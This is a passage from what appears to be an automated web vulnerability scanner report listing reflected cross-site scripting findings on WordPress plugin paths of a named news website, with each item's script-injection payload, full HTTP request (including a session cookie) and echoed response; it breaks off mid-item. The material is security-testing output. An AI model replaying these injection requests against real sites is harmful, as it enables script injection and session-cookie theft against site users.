The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1766c"><script>alert(1)</script>a3cebe2e404 was submitted in the REST URL parameter 4. This input was echoed as 1766c\"><script>alert(1)</script>a3cebe2e404 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/jquery-t-countdown-widget/css1766c"><script>alert(1)</script>a3cebe2e404/carbonite/style.css?ver=1.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:17:16 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=0ef95a81a72e24f1ca828c3010b7012d
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:17:21 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:17:21 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51083

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/jquery-t-countdown-widget/css1766c\"><script>alert(1)</script>a3cebe2e404/carbonite/style.css?ver=1.0'; }); return true;" >
...[SNIP]...

4.225. http://starscene.dailystar.com.lb/wp-content/plugins/jquery-t-countdown-widget/css/carbonite/style.css [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/jquery-t-countdown-widget/css/carbonite/style.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30e71"><script>alert(1)</script>7fa7d2fe231 was submitted in the REST URL parameter 5. This input was echoed as 30e71\"><script>alert(1)</script>7fa7d2fe231 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/jquery-t-countdown-widget/css/carbonite30e71"><script>alert(1)</script>7fa7d2fe231/style.css?ver=1.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:18:51 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=0ef95a81a72e24f1ca828c3010b7012d
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:18:53 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:18:53 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51083

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/jquery-t-countdown-widget/css/carbonite30e71\"><script>alert(1)</script>7fa7d2fe231/style.css?ver=1.0'; }); return true;" >
...[SNIP]...

4.226. http://starscene.dailystar.com.lb/wp-content/plugins/jquery-t-countdown-widget/css/carbonite/style.css [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/jquery-t-countdown-widget/css/carbonite/style.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27fda"><script>alert(1)</script>79aa2b78670 was submitted in the REST URL parameter 6. This input was echoed as 27fda\"><script>alert(1)</script>79aa2b78670 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/jquery-t-countdown-widget/css/carbonite/style.css27fda"><script>alert(1)</script>79aa2b78670?ver=1.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:20:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=0ef95a81a72e24f1ca828c3010b7012d
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:20:07 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:20:07 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51083

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/jquery-t-countdown-widget/css/carbonite/style.css27fda\"><script>alert(1)</script>79aa2b78670?ver=1.0'; }); return true;" >
...[SNIP]...

4.227. http://starscene.dailystar.com.lb/wp-content/plugins/jquery-t-countdown-widget/js/jquery.lwtCountdown-1.0.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/jquery-t-countdown-widget/js/jquery.lwtCountdown-1.0.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35285"><script>alert(1)</script>4225a2f4b94 was submitted in the REST URL parameter 1. This input was echoed as 35285\"><script>alert(1)</script>4225a2f4b94 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content35285"><script>alert(1)</script>4225a2f4b94/plugins/jquery-t-countdown-widget/js/jquery.lwtCountdown-1.0.js?ver=1.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:12:21 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=53f120e61fbe82ad465b6082ab426c2b
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:12:25 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:12:25 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content35285\"><script>alert(1)</script>4225a2f4b94/plugins/jquery-t-countdown-widget/js/jquery.lwtCountdown-1.0.js?ver=1.1'; }); return true;" >
...[SNIP]...

4.228. http://starscene.dailystar.com.lb/wp-content/plugins/jquery-t-countdown-widget/js/jquery.lwtCountdown-1.0.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/jquery-t-countdown-widget/js/jquery.lwtCountdown-1.0.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35731"><script>alert(1)</script>67b75d33874 was submitted in the REST URL parameter 2. This input was echoed as 35731\"><script>alert(1)</script>67b75d33874 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins35731"><script>alert(1)</script>67b75d33874/jquery-t-countdown-widget/js/jquery.lwtCountdown-1.0.js?ver=1.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:13:56 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=53f120e61fbe82ad465b6082ab426c2b
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:14:03 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:14:03 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins35731\"><script>alert(1)</script>67b75d33874/jquery-t-countdown-widget/js/jquery.lwtCountdown-1.0.js?ver=1.1'; }); return true;" >
...[SNIP]...

4.229. http://starscene.dailystar.com.lb/wp-content/plugins/jquery-t-countdown-widget/js/jquery.lwtCountdown-1.0.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/jquery-t-countdown-widget/js/jquery.lwtCountdown-1.0.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58968"><script>alert(1)</script>a8c63a8d62 was submitted in the REST URL parameter 3. This input was echoed as 58968\"><script>alert(1)</script>a8c63a8d62 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/jquery-t-countdown-widget58968"><script>alert(1)</script>a8c63a8d62/js/jquery.lwtCountdown-1.0.js?ver=1.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:15:40 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=53f120e61fbe82ad465b6082ab426c2b
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:15:42 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:15:42 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51093

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/jquery-t-countdown-widget58968\"><script>alert(1)</script>a8c63a8d62/js/jquery.lwtCountdown-1.0.js?ver=1.1'; }); return true;" >
...[SNIP]...

4.230. http://starscene.dailystar.com.lb/wp-content/plugins/jquery-t-countdown-widget/js/jquery.lwtCountdown-1.0.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/jquery-t-countdown-widget/js/jquery.lwtCountdown-1.0.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c1b7"><script>alert(1)</script>8927d43b38f was submitted in the REST URL parameter 4. This input was echoed as 7c1b7\"><script>alert(1)</script>8927d43b38f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/jquery-t-countdown-widget/js7c1b7"><script>alert(1)</script>8927d43b38f/jquery.lwtCountdown-1.0.js?ver=1.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:17:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=53f120e61fbe82ad465b6082ab426c2b
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:17:14 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:17:14 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/jquery-t-countdown-widget/js7c1b7\"><script>alert(1)</script>8927d43b38f/jquery.lwtCountdown-1.0.js?ver=1.1'; }); return true;" >
...[SNIP]...

4.231. http://starscene.dailystar.com.lb/wp-content/plugins/jquery-t-countdown-widget/js/jquery.lwtCountdown-1.0.js [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/jquery-t-countdown-widget/js/jquery.lwtCountdown-1.0.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6386"><script>alert(1)</script>6097b69b7c9 was submitted in the REST URL parameter 5. This input was echoed as b6386\"><script>alert(1)</script>6097b69b7c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/jquery-t-countdown-widget/js/jquery.lwtCountdown-1.0.jsb6386"><script>alert(1)</script>6097b69b7c9?ver=1.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:18:38 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=53f120e61fbe82ad465b6082ab426c2b
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:18:40 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:18:40 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/jquery-t-countdown-widget/js/jquery.lwtCountdown-1.0.jsb6386\"><script>alert(1)</script>6097b69b7c9?ver=1.1'; }); return true;" >
...[SNIP]...

4.232. http://starscene.dailystar.com.lb/wp-content/plugins/menu-manager/display/js/menu-manager.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/menu-manager/display/js/menu-manager.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee761"><script>alert(1)</script>77e6dcd8c2f was submitted in the REST URL parameter 1. This input was echoed as ee761\"><script>alert(1)</script>77e6dcd8c2f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contentee761"><script>alert(1)</script>77e6dcd8c2f/plugins/menu-manager/display/js/menu-manager.js?ver=2.0.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:08:57 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=9fde11401aee697d2f62e978ce373c3d
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:08:57 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:08:57 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51067

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-contentee761\"><script>alert(1)</script>77e6dcd8c2f/plugins/menu-manager/display/js/menu-manager.js?ver=2.0.0'; }); return true;" >
...[SNIP]...

4.233. http://starscene.dailystar.com.lb/wp-content/plugins/menu-manager/display/js/menu-manager.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/menu-manager/display/js/menu-manager.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce03d"><script>alert(1)</script>e9e57877bc8 was submitted in the REST URL parameter 2. This input was echoed as ce03d\"><script>alert(1)</script>e9e57877bc8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/pluginsce03d"><script>alert(1)</script>e9e57877bc8/menu-manager/display/js/menu-manager.js?ver=2.0.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:09:46 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=9fde11401aee697d2f62e978ce373c3d
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:09:47 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:09:47 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51067

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/pluginsce03d\"><script>alert(1)</script>e9e57877bc8/menu-manager/display/js/menu-manager.js?ver=2.0.0'; }); return true;" >
...[SNIP]...

4.234. http://starscene.dailystar.com.lb/wp-content/plugins/menu-manager/display/js/menu-manager.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/menu-manager/display/js/menu-manager.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d675f"><script>alert(1)</script>1cc53769364 was submitted in the REST URL parameter 3. This input was echoed as d675f\"><script>alert(1)</script>1cc53769364 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/menu-managerd675f"><script>alert(1)</script>1cc53769364/display/js/menu-manager.js?ver=2.0.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:10:58 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=9fde11401aee697d2f62e978ce373c3d
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:11:02 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:11:02 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51067

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/menu-managerd675f\"><script>alert(1)</script>1cc53769364/display/js/menu-manager.js?ver=2.0.0'; }); return true;" >
...[SNIP]...

4.235. http://starscene.dailystar.com.lb/wp-content/plugins/menu-manager/display/js/menu-manager.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/menu-manager/display/js/menu-manager.js

Issue detail

